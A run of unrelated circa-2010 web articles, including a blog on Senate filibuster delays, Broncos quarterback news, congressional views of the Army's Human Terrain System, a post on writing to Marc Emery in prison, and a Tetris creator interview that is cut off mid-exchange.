And I bring it up because filibuster reform is really something you could bring up every day , no matter what 's in the Capitol Hill news , and never have to worry about being topical , because if you look closely enough , you 'll always find signs of the long shadow that the filibuster casts over everything .
Today , it's on the " tax extenders " bill ( H.R. 4213 ) , which you may recall also contains unemployment insurance extensions as well , and was supposed to have been finished before Memorial Day , but was n't and so benefits for those most severely impacted by the economic downturn are beginning to expire .
Now , normally a bill like this -- with not just emergency unemployment measures in it , but which is also chock full of business tax breaks -- would have been expected to move much faster , but yet it languishes .
Why ?
Well , let 's start with the reason it did n't pass before Memorial Day as originally planned .
The House took care of its part just before the holiday , and sent it on to the Senate .
And as I said , you 'd normally see a bill like this pass pretty quickly .
But the political calculus of the Republicans is that any legislation passed by a Democratic Congress and signed by a Democratic President is a " win " for the Ds , and in their zero - sum world , therefore a " loss " for the Rs .
And they can't have that .
Or at least wo n't allow it without a fight .
So they fight tooth and nail to delay and derail everything they can .
Even if they can't ultimately kill a bill , delaying it gives them a chance to snipe at it , and as a consolation prize , deride the Democratic Congress as dithering and indecisive .
How 's that strike you , by the way ?
Criticizing Dems in Congress as slow to act ... for having had to wade through the procedural slog of shutting down Republican filibusters , of all things !
So when this bill made its way to the Senate just ahead of the scheduled Memorial Day recess , the Republicans needed only to find some sort of excuse for throwing the roadblock of the filibuster up in its path .
So they went with the old standby of being " deficit hawks " ( despite having been noticeably AWOL on that score with regards to , oh , say ... eight continuous years of off - budget war ) .
Truthfully , it hardly matters whether there 's an actual reason behind a filibuster .
After all , it 's been ages since a filibuster was actually about the thing which is supposed to literally define what a filibuster is -- that is , " extended debate . "
When was the last time you saw any of the people who insisted on voting against cloture actually show up to listen to and participate in extended debate ?
At any rate , the fact is that the mere threat of a filibuster -- especially when the Senate is heading into a holiday recess -- is often enough to derail a bill temporarily .
That 's because even a bill that has overwhelming support in the Senate , and has more than enough Senators willing to vote for cloture , still has to actually go through the torturous and time - wasting process of invoking cloture .
These days , Republican obstructionists are routinely filibustering even the motion to proceed to consideration of a bill , meaning they 're filibustering the question of whether or not the Senate should even begin debate !
That means that getting to a vote on the tax extenders bill , even if you have 60 + votes ready to go , means filing a cloture motion ( along with a petition signed by 16 Senators , which is never a problem ) , but then waiting for a full calendar day to pass after the day on which you filed the motion .
Then , after one hour of session has elapsed on the second calendar day following the filing , your cloture motion is " ripe " for consideration .
But remember , even if you trounce the opposition , all cloture gets you is the right to end debate ... after another 30 hours of it !
So now you 've spent about a day and a half to get to your cloture vote , won the vote , but may have to sit by for another 30 hours before you ever get to actually vote on whether or not -- get this -- to begin debate on the bill !
But hold on , you 're not done yet !
Because now that you 've spent three days or so getting to the vote on whether or not to begin debate on the bill , you 're likely to face yet another filibuster on the bill itself .
So even if you file for cloture on the bill right away , you 're still looking at another three days or so before you get to vote on passing it .
Now , if you 're backed up against a holiday weekend and a recess , you can see where that would cause some problems .
Yes , Senators get the big bucks to stick around and do their jobs , especially when there are families in trouble out there who need this help .
But it 's no small thing for a politician to skip Memorial Day festivities back at home .
Nobody wants to have to call the local VFW and tell them you 're not coming to their parade .
And who needs Republican press releases , blaring , " Senator Jones Refuses to Honor Local Veterans " ?
And remember , even when there 's no recess looming , the Senate is very often in session only 3 - 4 days a week , which can mean that a filibuster threat can add nearly two full weeks of time - wasting to any bill .
That 's a pretty costly investment to be forced to make on anything , and necessarily means less time will be available for other priorities .
And that 's not even taking into consideration what additional time you 'll need if there are any amendments you 'd like to get through .
Even good Democrats will sometimes threaten to vote to sustain a filibuster if cloture means they wo n't get an opportunity to vote on what they consider to be important amendments .
So here we sit , in the third week of the pendency of this critical unemployment extension , because obstructionist Republicans were able to stretch this thing out over a recess with the threat of a filibuster .
And the threat continues , now that they 're forcing yet another cloture motion to bring the bill to a final vote , even as the very families most threatened by long - term unemployment have not only already been cut off , but are looking at the possibility of benefits that 'll be reduced by $ 25 a month even if they do resume .
That 's just the most current manifestation of filibuster abuse 's impact on initiatives important to regular Americans .
And remember , nobody has actually had to stand up and filibuster , either before the recess or since .
Nobody has had to actually have that " extended debate . "
Nor is it even clear that they could n't have gotten 60 votes to get down to business before Memorial Day .
But the threat of forcing a cloture vote ( or even two ) , was at the time enough to wreck everything for some very desperate families .
ENGLEWOOD , Colo . -- Broncos coach Josh McDaniels said Saturday after minicamp that Kyle Orton will be his starter heading into training camp .
" We 've got a guy [ Orton ] who 's going to go into camp as the starter , no question about it and he deserves it , " McDaniels said .
" If somebody comes in there and plays better than he does then that player will play . "
From there , the competition is open as Brady Quinn and rookie Tim Tebow will have an opportunity to win the job .
About this point last spring , McDaniels , then in his first year as coach , anointed Orton as his starter .
This time , though , McDaniels ' proclamation seemed a casual assumption .
" He is the starter , no doubt , " McDaniels nonchalantly said .
On a rainy and cool practice Saturday , Orton received a bulk of the reps , an explicit indication he 's the leader of the QB pack .
Asked if the competition was even close right now , McDaniels said , " It 's clear , I think , that Kyle is definitely ahead .
There 's no question . "
Orton is n't really giving the competition much thought , just going about his business .
That 's always been his approach .
" I 'm really happy with the way I 'm playing and just really have more confidence right now than I 've ever had , " he said .
Orton is coming off a season in which he threw for a career - high 3,802 yards and 21 touchdowns .
But Denver limped home down the stretch and missed the playoffs despite a 6 - 0 start .
The Broncos brought in a cache of quarterbacks to challenge Orton , acquiring Quinn from Cleveland in March and then drafting Tebow , the two - time national champion and Heisman Trophy winner out of Florida .
Being the incumbent , though , and with a year of this intricate offense under his belt , Orton feels like he 's a step ahead .
" It 's just night and day , " Orton said about his improvement since last season .
" There 's really just no comparison between myself and anyone else who 's been in this offense for two years . "
Precisely why he has a lock on the starting spot .
Quinn or Tebow still have something to say about that .
" I do n't know if it matters if it 's close or not , but they 're going to keep pushing [ Orton ] and working hard to try to improve their game so that they can make it close , " McDaniels said .
" I think we had three guys out there that practiced pretty well [ Saturday ] . "
Not to mention a rookie receiver who 's steadily finding his groove .
Demaryius Thomas , a first - round pick from Georgia Tech , is working his way back into shape after being sidelined earlier this spring with a broken left foot .
" He 's doing great , " McDaniels said .
" In terms of trying to get better at the things that he has struggled with or made an error with -- he has really worked hard to try to fix those . "
Lately , Thomas has been spending time with former Broncos standout Rod Smith , who holds team marks for career receptions ( 849 ) , yards receiving ( 11,389 ) , touchdown catches ( 68 ) and touchdowns ( 71 ) .
The tutoring is taking hold .
" He helped me out a lot , " said Thomas , who tweaked his knee late in practice but said it was n't anything serious .
" Some of the stuff that he told me he did and would help me out and I tried it today and it did help . "
Stuff like ?
" It was basically getting off the line and getting off press and using my body and using my shoulders -- something I never did before , " he said .
Thomas was n't the only receiver to dazzle Saturday , with Matthew Willis out of UCLA turning in quite a catch between defensive backs in a red - zone drill .
Kenny McKinley was n't to be outdone , leaping in the corner of the end zone to haul in a pass .
However , Pro Bowl safety Brian Dawkins refuted McKinley 's catch , throwing his helmet as a makeshift flag and protesting that McKinley stepped out before the grab .
Still , it was a good day for the young wideouts as they build a rapport with Orton , Quinn and Tebow .
" I have a [ high ] comfort level with all these guys , " Orton said .
" All these guys run great routes . "
ESPN Insider Adam Schefter and The Associated Press contributed to this report .
Recycled news — because it ’s always tastier when it ’s refried .
At different times on this blog over the past two years we have quoted the House Armed Services Committee on its views of the U.S. Army ’s Human Terrain System .
The latest report is causing some to wonder what is really being said , and how to interpret it .
From the point of view of the American Anthropological Association , the HASC has issued “ a stinging rebuke ; ” for Kerim at Savage Minds , “ It ai n’t over , but it seems like HTS is at least ‘ on hold ’ for now ; ” for Noah Schachtman at Danger Room , this means that the HASC “ puts the brakes on ‘ Human Terrain ’ ” ; one of the comments on the Danger Room post says “ this is neutral news , not negative ; ” for Inside Higher Ed , this simply “ raises questions ” : “ the House Armed Services Committee included language in its version of the military authorization bill that raises questions about the Human Terrain System …and suggests that funds could be cut off for the program if the Pentagon does n’t take certain actions ; ” for Spencer Ackerman at The Washington Independent , this news shows that the HASC is “ displeased ” with HTS .
Put it all together and you get : stingingly neutral displeasure that raises some momentary questions , maybe , maybe not .
Pressed on how I interpreted the language , I recently replied , “ one way to understand it might be to read it as what it is not saying –for example , it is not saying that the future of the program is guaranteed , and it is not saying that there will be an increase in funding , or that the funding will be continuous even in the short term . ”
Another way to put the language in context , is to juxtapose all three statements made by the HASC about HTS over the past two years .
2008
In what appears to be the first instance , here is the HASC ’s final report on H.R. 5658 , dated 16 May 2008 :
“ The committee notes that today ’s military forces are involved in a growing number of complex missions from counterinsurgency to security and stability operations .
These missions are best served by a security force that understands and appreciates the individual , tribal , cultural , ethnic , religious , social , economic , and other aspects of the human terrain .
The committee supports the Department ’s effort to reshape their approach to research , training , and doctrine to adapt to the current irregular warfare environment .
The Department ’s creation and deployment of Human Terrain Teams ( HTT ) that employ cultural awareness and analysis practices notes one approach toward adapting to complex military operations ” ( p. 271 ) .
“ In title XV of this Act , the committee notes the contributions of the prototype HTTs currently supporting operations in Iraq and Afghanistan and believes that sound research and resulting tools are key technology enablers for success of these teams now and in the future ” ( pp. 271-272 ) .
“ The committee recommends $ 13.4 million , an increase of $ 4.0 million , in PE 63670D8Z and $ 8.0 million , an increase of $ 2.0 million , in PE 64670D8 Z for the continued development , demonstration and rapid transition of key technologies supporting human terrain understanding and forecasting to include , Mapping the Human Terrain Joint Capability Technology Demonstration and the Conflict Modeling , Planning and Outcome Experimentation Program ” ( p. 272 ) .
Not just additional monetary support , but this unmistakable endorsement :
“ The committee has also been encouraged by the success of integrating social science expertise into Department of Defense operations via the Human Terrain Teams ( HTT ) , which provide culturally relevant advice to military decision makers .
As has been pointed out in recent testimony before the committee , these teams provide value added to traditional military operational planning and have been instrumental in saving lives in Operation Iraqi Freedom and Operation Enduring Freedom .
The committee believes that more programs in the future should be informed by social science research ” ( p. 279 )
And , the grand finale in their report on HTS in 2008 — money , well wishing , applause :
“ The committee supports the concept for the prototype Human Terrain Teams ( HTT ) currently supporting Operation Iraqi Freedom and Operation Enduring Freedom .
HTTs have been instrumental in saving the lives of coalition troops by reducing casualties among Afghani and Iraqi civilians .
HTTs provide our warfighters with non-kinetic options in planning and carrying out their missions .
The committee is aware that the first prototype HTT is credited with reducing kinetic operations by more than 60 percent during its first 6 months of deployment in Operation Enduring Freedom .
HTTs are critical enablers to shaping military planning in pre-conflict environments , and are supportive of reconstruction and stabilization efforts .
HTTs are currently proving their value in Iraq and Afghanistan , and the committee believes that capability would prove equally valuable in other combatant command areas of responsibility .
The committee recommends $ 90.6 million in Operation and Maintenance for the purpose of fielding additional HTTs to meet the current Central Command requirement of 26 teams .
The committee encourages the Department to begin training , equipping , deploying , and sustaining human terrain teams with other regional combatant commands to include at least one each for Pacific Command , Southern Command , and Africa Command ” ( p. 479 )
2009
What a difference a year can make .
HASC ’s final report on H.R. 2647 , dated 18 June 2009 :
“ The committee continues to support the concept behind the Human Terrain Teams ( HTT ) and the overall Human Terrain System ( HTS ) .
In the committee report ( H. Rept. 110–652 ) accompanying the Duncan Hunter National Defense Authorization Act for Fiscal Year 2009 , the committee expressed support for expansion of the HTT concept , including to other combatant command areas of responsibility ” ( p. 154 )
But ?
“ The committee is aware of anecdotal evidence indicating the benefits of the program supporting operations in the Republic of Iraq and the Islamic Republic of Afghanistan .
The committee also notes that a number of press accounts provide anecdotal evidence indicating problems with management and resourcing .
The committee finds it difficult to evaluate either set of information in the absence of reliable , empirical data ” ( pp. 154-155 ) .
Therefore ?
“ Therefore , the committee directs the Secretary of Defense to conduct an independent assessment of the Human Terrain System , and submit to the congressional defense committees a report detailing that assessment by March 1 , 2010 .
The independent assessment should consider the following elements :
(1) An overview of all of the components of HTS , including related technology development efforts ;
(2) The adequacy of the management structure for HTS ;
(3) The metrics used to evaluate each of the components of HTS ;
(4) The adequacy of human resourcing and recruiting efforts , including the implications of converting some contractor positions to government positions ;
(5) An identification of skills that are not resident in government or military positions , and how the Army can leverage academic networks or contracting opportunities to fill those gaps ;
(6) An identification of policy or regulatory issues hindering program execution ; and
(7) The potential to integrate HTS capabilities into existing Exercises ” ( p. 155 ) .
2010
HASC ’s final report on H.R. 5136 , dated 20 May 2010 :
“ While the Committee remains supportive of the Army ’s Human Terrain System ( HTS ) to leverage social science expertise to support operational commanders in Iraq and Afghanistan , it is increasingly concerned that the Army has not paid sufficient attention to addressing certain concerns .
The Committee encourages the Department to continue to develop a broad range of opportunities that leverage the important contributions that can be offered by social science expertise to support key missions such as irregular warfare , counterinsurgency , and stability and reconstruction operations .
The bill limits the obligation of funding for HTS until the Army submits a required assessment of the program , provides revalidation of all existing operations requirements , and certifies Department - level guidelines for the use of social scientists ” ( p. 25 ) .
Has there been a change of tone , a decline in enthusiasm , more questions being asked , less praise , and less mention of new money to support the program ?
It seems so .
Safer Days ahead for all of us
How exactly does one worship something one cannot define , something for which one has no coherent definition ?
How could this possibly be distinguished from worshiping nothing ?
It would seem to me that the best someone could do would be to worship a vague idea of this undefined something .
And where would such an idea come from ?
Undoubtedly , it would be influenced by many sources ( e.g. , a text , the teachings of one 's parents or one 's church ) .
But at root , it would come from one 's own mind .
It would be one 's interpretation of various sources , blended to form a conceptualization that would be similar but not identical to that of other devotees .
Suppose I were to tell you that I worship love .
You 'd probably ask me to explain what I meant by " love " in this context .
When I told you that I could n't define love and that it was beyond my comprehension , you'd be right to wonder what I could possibly mean by claiming that I worshiped it .
Now what if I were to tell you that I worshiped my own unique understanding of love based on my personal experiences with it ?
You would then expect that I might be able to provide a coherent definition of my understanding of love .
If I could n't , you 'd be right to dismiss me as a moron .
But you 'd also be right to wonder if I was n't more than a little narcissistic for worshiping my own idea .
You might wonder how different this was from saying that I simply worship my own mind .
We atheists sometimes get bogged down in trying to decipher Christianspeak as if it was anything other than nonsense .
Perhaps the Christian who insists that he or she has a " personal relationship " with Jesus is not really referring to someone who either never lived at all or who lived briefly and has been dead for over 2,000 years .
Instead , maybe this Christian is describing a form of self - love ( i.e. , I love my own idea of what this particular entity might be ) .
Could that be why many are so reluctant to give up such beliefs ?
Mobile search is central
Mobile websites and apps
The future
Stock Repurchase
As previously announced , Google intends to repurchase in the open market a number of shares equal to the number of shares issued in the transaction and issuable upon exercise of outstanding options to purchase common stock issued by AdMob .
The repurchase program is expected to commence shortly after the completion of the acquisition .
The repurchases will be funded from available working capital .
How To Send Mail To Mark Emery While He ’s In Jail
Now that my e-mail works again , I have been in contact with the fine people at Cannabis Culture magazine , specifically Jodie Emery .
As all of you are well aware , her husband Marc Emery is wrongly incarcerated in US Federal Prison for selling marijuana seeds .
What readers might not know is that you can write Marc letters and send them to him !
I have never been in prison , but members of my family have , and they always talk about how ‘ letters from the outside ’ were what got them through the hardest times .
I do n’t know about you , but I plan on sending letters every week .
Can you imagine if every marijuana consumer in America and Canada sent at least one letter a week to Marc ?
The sheer volume of mail would overload the prison , and would highlight the atrocity that is Marc ’s incarceration to the point that they ’d have to let him go ( or at least raise one hell of a stink ! ) .
You might not be able to go protest in BC , but ANYONE can write and send a letter .
Here are the instructions from Cannabis Culture on how to do just that :
To be safe , please send only hand - written or hand - typed letters .
Photos are permitted , but PLEASE do n’t send pictures of bongs , marijuana , plants , nudity , or anything illegal or inappropriate because it will be refused .
The only books that Marc wants right now will be sent by Jodie .
Otherwise , when new books arrive , Marc has to give up the ones he is reading .
In the next few months , an Amazon.com “ wish list ” for Marc will be set up .
ALL MAIL IS THOROUGHLY READ BY PRISON OFFICIALS .
Do not write about illegal activities or anything that you want to keep private .
The official guidelines are listed below .
Please write to Marc about what you ’re doing in your life , the activism you ’ve done , the silly little pleasures and joys of your day , the news about what ’s happening in the world and your area , etc .
Prison life is just endless boring repetition , cut off from the outside .
Nothing ever changes and nothing new ever happens , so Marc would really appreciate getting reports from the outside world !
Mailing address :
Marc Scott Emery # 40252-086 Unit DB
PO Box 13900
FDC SeaTac
Seattle , Washington
98198-1090
USA
The rules for prison mail are EXTENSIVE , so rather than post them all here , simply click on this link and make sure your mail follows the rules .
Jodie Emery was kind enough to grant theweedblog.com permission to post Marc ’s blog entries .
He has put up a total of four so far ; the first one is pasted below .
I will post one a day until we are caught up .
Report from US Federal Prison # 1
May 24th , 2010
I share a cell with Oliver , a Jewish Iranian - Canadian guy ( see Jodie Emery ’s blog entry for more on fellow inmates ) .
It ’s like North Fraser pretrial centre , concrete & steel , but with a locker .
Outside of our cell is the “ range ” where 60 of us eat , shower , watch Tv and play cards or dominoes or such activities , as well as walking the second level walkways for exercise .
We are locked in our cells from 10 pm to 6 am , and from 10 am to 11:30 am and 4 pm to 5 pm .
The other times we can be in the range .
Normally , the range is surprisingly quiet , most people are doing things , and the TVs are by radio signal only .
An inmate lent me a radio with ear buds ( my own one arrives Tuesday ) and there are many , many FM music stations it can pick up , many quite good , so that ’s a nice discovery .
PLUS , get this , I can pick up CBC Radio One at 91.7 clear as a bell , so I can hear the news !
I asked other inmates how I could get a cell on the other side of the range , because the windows over there have sunlight coming through them , and we have no outdoor exposure here of any kind , no fresh air at all , but if I could get some sun that would be nice .
You have to keep an eye on when an inmate moves out and then claim his cell , so I will keep inquiring .
My cell does n’t have a desk in it like some do , I could really use that for all my writing , there is n’t a flat surface in my cell for that .
The poor food is getting me a bit down , but getting my commissary goods on Tuesday will help .
I hope the place I get sent to after here has better opportunities for vegetables or better food , but it looks like I ’ll be in tough while in these prisons .
I ’m helping a fellow who is coming off methamphetamine deal with his wasted life so far and helping to rebuild him into a good human again .
You know this is what I ’ll do with the inmates who always come to me for help , and of course they do come to me .
But no one is really aware of my work in the field of drug addiction & recovery or my political activism , but since I do n’t need help , its unnecessary that they know my storied career .
Having actual “ fans ” here might even be annoying because they might pester me for stories and I ’m more into my studies here and listening to those who need help and working on rebuilding them into decent citizens and good sons and good parents and helping them see how and why they screwed up —
I ’m totally brutally candid with them and they appreciate it because I do n’t want anything from them — and then how they can change and redeem their sorry - ass behavior with proper , responsible living .
All these people have kids and parents who are very sad and disappointed and I can rock them out of their self - centered obsession .
Richie went through this with me in North Fraser , but he needs another good 6 weeks of me for him to reform .
He was thief for most of 20 years , lying to himself and all others blithely , yet now he is 40 and at a crossroads .
Update sent on Monday evening , May 24th after entering his guilty plea
I left for court at 6:15 am , was shackled in cuffs & chains from 7 am to 5 pm , 10 hours , with the exception of the half hour in court 2 pm to 2:30 pm .
Court was fine .
I plead guilty as scheduled .
Britney , Jeremiah , Allison Bigelow , and Joanne Vanderwolf ( an employee from 1995 ) was there , Joanne was wearing a No Extradition shirt and was protesting outside because she brought her FREE MARC sign into the court .
I was chained and waiting in a cold cell the other 9.5 hours .
I have n’t had a shower or bathroom use yet , I ca n’t wait to get that done but shower time next is 7:30 pm and its about 6 pm now .
I was on TV here today as people protested at the courthouse .
That ’s what inmates here tell me .
A number of them saw it and are introducing themselves to now because they realize who I am , including the Mexicans .
A guard also read somewhere about the protests in Canada and around the world and said , “ I guess a lot of those people are saying ‘ Fuck those damn Yankees that took ya away ' ” , and I responded , “ We love the American people , but the US government is bad . ”
I ’ll be sure to call or write later , after I wash and get centered again .
Even though it ’s horrible here , there ’s lots to be thankful for , I suppose …
That ’s the thing about jail , you get the blues or internalized anger over things because everything is wearing on my spirit , and its only been a little over 2 weeks .
There ’s a human element to hotels that often goes unnoticed by its guests .
Beyond the check - in desk and past the steel “ Staff Only ” doors are employees with real feelings and concerns about the communities in which they live , and those emotions are apparent in the social efforts made both inside and outside the hotel .
From clean - up programs to rescue efforts , hotels have consistently offered ways their staff and guests can give back .
Simply put : I love when good brands do good deeds .
The Ritz - Carlton announced today it will offer environmentally - friendly water bottles at its North American hotels and select properties in the Caribbean .
This news comes at a time when many travelers are seeking information on the oil spill clean - up efforts , and is another example of how the hospitality industry is working hard to help build social awareness around our top environmental issues .
According to a statement from the hotel , an estimated 5 million , 16 oz - plastic water bottles are used every year at Ritz - Carlton properties .
Armed with this information , Simon F. Cooper , president and chief operating officer of The Ritz - Carlton Hotel Company , challenged his team to find a more environmentally - friendly solution .
” Four years ago I realized that we were sending 10 million plastic bottles to landfills in North America , and we have been working with suppliers ever since to change that , ” Mr. Cooper told me .
Fast forward to today , and guests at Ritz - Carlton ’s North American hotels and select properties in the Caribbean will now drink from a 16 oz all - natural water bottle made entirely from plants .
The co-branded water bottle , part of a new partnership between The Ritz - Carlton and Prima , can decompose in 30 days in a commercial composting facility , or can be reprocessed and remade 100 percent into new bottles .
Manufacturing the new bottle requires 49 percent less fossil fuels , 45 percent less energy , and 75 percent less greenhouse gases than a classic plastic water bottle .
The renewable Prima water bottle is made from Ingeo , a performance plastic comprised of 100 percent renewable resources .
“ Plastic bottles are made from crude oil , take a significant amount of energy to produce , and less than 20 percent are sent to recycling facilities .
Even when recycled , these bottles cannot be used to make the same quality of plastic , ” Cooper said .
Earlier this year , Marriott International ( which includes The Ritz - Carlton Hotel brands ) announced the launch of a water conservation project in China .
The new Prima water is expected to transition to all North American and select Caribbean properties within the next few weeks .
According to city officials , the pride parade planned for this weekend will not be rained on .
Despite receiving over 300 emails Wednesday afternoon urging Mayor Lioneld Jordan to withdraw the city ’s support for the parade and other festivities including a mayoral proclamation , Fayetteville Communication Director Lindsley Smith said Saturday ’s activities will go on as scheduled .
“ The Mayor is still excited , ” said Smith .
“ Everything ’s still on . ”
Most of the messages included identical body copy which came pre-loaded in an online action form set up by the American Family Association .
Nearly all of them began with the statement , “ I am shocked to learn that the city of Fayetteville is issuing a proclamation in support of the homosexual activist group , Northwest Arkansas Pride . ”
Smith said the majority of the emails were from non-Fayetteville residents .
The AFA issued a press release earlier this afternoon criticizing the recent announcement that 10 - year - old Will Phillips will serve as grand marshal of Saturday morning ’s parade .
AFA President Tim Wildmon says allowing Phillips to lead the parade is a form of child abuse .
“ It ’s shameful that adults would abuse a brain - washed child in this way , ” said Wildmon .
“ He ’s obviously just parroting the nonsense he ’s been told by manipulative adults . ”
Wildmon called on Mayor Jordan to cancel his plans to issue the proclamation saying , “ There is nothing about homosexual conduct to be proud of , and much to be ashamed of . ”
Wildmon ’s online form urged those in support of the AFA ’s cause to fill in a custom subject line before submitting the message .
“ Are you Insane ? ” reads one subject line .
“ Please enter your own subject line , ” reads another .
Saturday ’s activities kick off at 10 a.m. on Dickson Street .
Two Kawasaki T - 4s from the Japanese Air Self Defense Force " Blue Impulse " demonstration squad are either performing a belly - to - belly maneuver or one of the pilots is awful at using his instruments .
[ Photohito ]
Advertisement
Sharron Angle floated possibility of armed insurrection
Here 's another one that could be tough for Sharron Angle to explain away :
In an interview in January , Angle appeared to float the possibility of armed insurrection if " this Congress keeps going the way it is . "
I 'm not kidding .
In an interview she gave to a right - wing talk show host , Angle approvingly quoted Thomas Jefferson saying it 's good for a country to have a revolution every 20 years -- and said that if Congress keeps it up , people may find themselves resorting to " Second Amendment remedies . "
What 's more , the talk show host she spoke to tells me he does n't have any doubt that she was floating the possibility of armed insurrection as a valid response if Congress continues along its current course .
Asked by the host , Lars Larson of Portland , Oregon , where she stands on Second Amendment issues , Angle replied :
You know , our Founding Fathers , they put that Second Amendment in there for a good reason and that was for the people to protect themselves against a tyrannical government .
And in fact Thomas Jefferson said it 's good for a country to have a revolution every 20 years .
I hope that 's not where we 're going , but , you know , if this Congress keeps going the way it is , people are really looking toward those Second Amendment remedies and saying my goodness what can we do to turn this country around ?
I 'll tell you the first thing we need to do is take Harry Reid out .
Larson says Angle was floating the possibility of armed insurrection if Congress keeps it up under Reid et al .
" If it continues to do the things it 's doing , I think she 's leaving open that possibility , " Larson said .
" And I think the founders believed that the public should be able to do that when the government becomes out of control .
It just matters what you define as going too far . "
The most charitable interpretation here was that Angle was floating armed insurrection -- or " Second Amendment remedies " -- as a defensible response if electoral politics fails to change where things are headed under the current regime .
Also , the larger context is key : TPM reports this morning that Angle was a member of the far - right Independent American Party , a pro-gun , states - rights party that warns against the threat of global government .
She has also said she 's a member of the patriot group " Oath Keepers , " though she 's since disavowed that bunch .
A federal judge has ordered Missouri state officials to allow a splinter group of the Ku Klux Klan to hold a picnic at a Civil War historic site after the group filed a lawsuit claiming it was discriminated against by the state .
Frank Ancona , “ the Imperial Wizard of the Traditionalist American Knights of the Ku Klux Klan , ” filed a lawsuit on Wednesday alleging that his organization had been “ treated differently ” from others when it applied for a license to hold a picnic at Fort Davidson , some 70 miles south of St. Louis .
ADVERTISEMENT
“ Rather than simply checking for availability on the calendar , as is done for other groups seeking to use the pavilion , plaintiff was required to submit a written request outlining his plans , ” the lawsuit ( PDF ) stated .
“ Other organizations are not required to make written requests to use the large shelter if nothing will be sold to the public . ”
The lawsuit asked the judge to declare that the Klan ’s constitutional rights were violated by the refusal , and also asked for a temporary injunction forcing the state to allow the picnic to be held this Saturday .
On Wednesday , District Court Judge Rodney Sippel did just that , ordering the state ’s natural resources department to allow the picnic to go ahead provided the Klan can post an $ 1,800 bond and prove it has $ 300,000 in liability insurance .
According to the St. Louis Post - Dispatch , Ancona says the picnic may not happen because of the financial requirements the judge placed on the group .
The state had reportedly objected to the Klan ’s application on the grounds that a flyer the Klan was planning to hand out at the picnic featured a historically inaccurate Confederate flag .
The version of the Confederate flag that had flown at Fort Davidson was different from the one featured in the Klan literature .
ADVERTISEMENT
Judge Sippel rejected that argument , saying that the content of the Klan ’s materials was irrelevant .
Even if everything the group asserts is wrong , “ they still have a right to say it , ” the judge said , as quoted at the Post - Dispatch .
In an interview with the paper , Ancona “ acknowledged that his group is a white supremacist organization , but he said that it is not a hate group and that it bars neo -Nazis . ”
“ This has nothing to do with race , ” Ancona argued , saying it was an issue of free speech .
ADVERTISEMENT
Fort Davidson was the site of a brutal 1864 battle that left some 1,500 Confederate soldiers and 184 Union soldiers dead .
According to the Riverfront Times in St. Louis , the state had allowed the Confederate flag to be flown at the site until 2003 .
The KKK wants the flag to return to the site .
Alexey Pajitnov - Tetris : Past , Present , Future
By Christian Nutt
Alexey Pajitnov is , of course , the creator of Tetris -- a game he originally developed while working at the Academy of Sciences in Moscow in 1985 .
Of course , during the late ' 80s the game 's popularity exploded internationally .
It essentially founded the casual puzzle genre thanks to its appeal to a very wide audience , and made dropping - block puzzles a staple of game design .
These days , Pajitnov is not just one of the principles of The Tetris Company , which manages the rights to the game in its many current incarnations ; he 's also still an active developer , as he discusses in this interview , working on a new multiplayer iteration of Tetris that 's been underway for over 10 years .
Gamasutra spoke to Pajitnov at the conclusion of the game 's 25th anniversary festivities , and discussed with him his current views on the industry , his memories of the game 's initial development , and what he 's currently working on .
This interview touches on everything from basic tenets of multiplayer design to the potential future of the game industry -- as per Pajitnov 's vision .
The 25th anniversary of Tetris is coming to a close .
Alexey Pajitnov : Yes .
Yes .
You can't have anticipated the celebration of the 25th anniversary of Tetris when you were originally working on it , I 'm sure .
AP : [ laughs ]
Absolutely not !
We 're all familiar with the story of you sort of working on it in the then - Soviet Union as a personal project .
There was no anticipation that it would even be a commercial product , when you first started it , right ?
AP : Exactly , yes .
Well , when the game started just breeding , you know , the very first version , the very first prototype , I did realize that it might be a very good game because it was very addictive even in the early stage , but I never could have imagined anything like the history it actually had .
At that time , while there were a lot of home computers in the West , there were n't really home computers in the USSR , were there ?
Not for average people .
AP : Not really .
That 's right .
All the computers were used mainly for scientific and research [ purposes ] .
They were n't even seriously used in any commercial purposes .
And the computers that you used at the time , were they imported from the West ?
Or were they homegrown technology ?
AP : Actually both .
We had several kinds of Russian - produced computers , and I used to work on them .
But my computer server was one of a small number of not - secret organizations because it was Academy of Science .
That 's why many of Western kind of companies just exchanged with us , with hardware as well .
So , basically , we did see some Western computers as well .
When you were originally working on Tetris , what kind of computer was it that you used to produce the first version ?
AP : It was Russian computer called Elektronika 60 .
It was a clone of LSI - 11 computer like PDP - 11 .
It was kind of a mini machine .
[ laughs ]
It was very ancient , and it did n't have any graphics on the screen , just letters and numbers .
It 's interesting the whole story about how Tetris came out in the West , it was very convoluted at the time as well , the original releases .
We 've spoken to Henk Rogers recently , and everyone knows the history there , but it was quite an interesting process .
AP : Yes .
That was fun .
It 's not just that it was a game that was very good for the time ; it was foundational .
It defined a genre .
It defined a new genre , which is something that game developers have struggled with .
Even at the time , when the medium was more ripe for exploration , it was still hard to define that new way of looking at gameplay .
AP : Yes .
Well , most of the games which were popular at that time were like was like mostly like a kid-ish game with animated characters like Pac - Man or Q*bert .
Tetris was obviously appealing to everybody , not just for children .
Did you have any access to other Western games on the computers that you had there ?
Were you able to play things ?
AP : I had seen them and tried them , but they were n't available for me for all time , you know .
At that time I did n't work on PC ; I could just come to my colleagues and ask to look at them , but it was n't in my possession .
Were you actually interested in games as such as something to move forward in at the time , or were you just doing this just because you had the idea ?
AP : Well , I was very interested in games .
I liked to play every game .
I like board games and everything .
Tetris was n't my first game , I wrote several other puzzles at that time .
They were n't very interesting , but I did it .
So , basically , yes , I did have a certain interest in games at that time .
Whatever happened to the predecessors to Tetris ?
Do they still exist , or are they lost ?
AP : Well , I did publish a couple of them later , something based on those early prototypes .
But most of them were lost , of course .
In my profession , as I became a game designer after that , it 's about no more than 15 percent of your original ideas came to even the project , you know .
As far as product is concerned , I think it 's about 10 percent , so it 's kind of natural .
Do you find that that 's still the case ?
What are you working on today that you can talk about ?
AP : I have a couple ...
I do a couple of projects just for my own kind of fun , but they are really slow and in the very early stage .
But mainly , I am working on next Tetris versions .
So , you still actively work on the Tetris property at this stage ?
AP : I can't say it 's very actively , but yes , I do spend some time on versions .
First of all , we need to approve of the versions which we license out .
So , that 's part of the job .
I need some time to review the versions .
And basically , while we have some discussions on " what should we do next ? " and " what is important for Tetris next ? "
I am not involved in any real projects in development , but strategically , yes , I am involved .
One of the things about Tetris that I think is really interesting is that once it became popular , all the companies that had the rights to it started creating evolutions of it .
So , if you look back to the early '90s , you 'll have things like Nintendo had Tetris 2 , which was n't really Tetris .
One of my favorites is the really obscure Tetris Battle Gaiden for the Japanese Super Famicom .
AP : That was a wonderful game .
Yeah , I really loved it .
